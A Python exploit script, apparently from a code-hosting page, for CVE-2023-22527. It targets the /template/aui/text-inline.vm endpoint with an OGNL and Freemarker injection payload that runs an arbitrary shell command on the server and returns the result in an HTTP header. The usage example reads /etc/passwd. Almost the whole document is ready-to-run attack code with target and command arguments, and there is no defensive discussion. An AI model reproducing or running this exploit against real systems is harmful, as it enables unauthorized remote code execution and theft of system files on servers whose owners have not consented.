README.md
Rendering markdown...
# @Time : 2024/1/23
# @Author : jeyiuwai
# @File : CVE-2023-22527.py
import argparse
import requests
def exploit(target, cmd):
url = f"{target}/template/aui/text-inline.vm"
# target = "http://192.168.11.136:8092"
# cmd = "cat /etc/passwd"
http_proxy = "http://127.0.0.1:8080"
https_proxy = "http://127.0.0.1:8080"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = r"label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'" + cmd + "'}))"
# response = requests.post(url, headers=headers, data=data, verify=False, proxies={"http": http_proxy, "https": https_proxy})
response = requests.post(url, headers=headers, data=data, verify=False)
if (response.headers.get("X-Cmd-Response")):
print(response.headers.get("X-Cmd-Response"))
else:
print("No response")
def main():
parser = argparse.ArgumentParser(
description="Send request with target and cmd parameters",
usage="python3 CVE-2023-22527.py --target <target> --cmd <cmd>\nExample: python3 CVE-2023-22527.py --target http://192.168.11.136:8092 --cmd \"cat /etc/passwd\""
)
parser.add_argument("--target", required=True, help="Target address")
parser.add_argument("--cmd", required=True, help="Value for the cmd parameter")
args = parser.parse_args()
exploit(args.target, args.cmd)
if __name__ == "__main__":
main()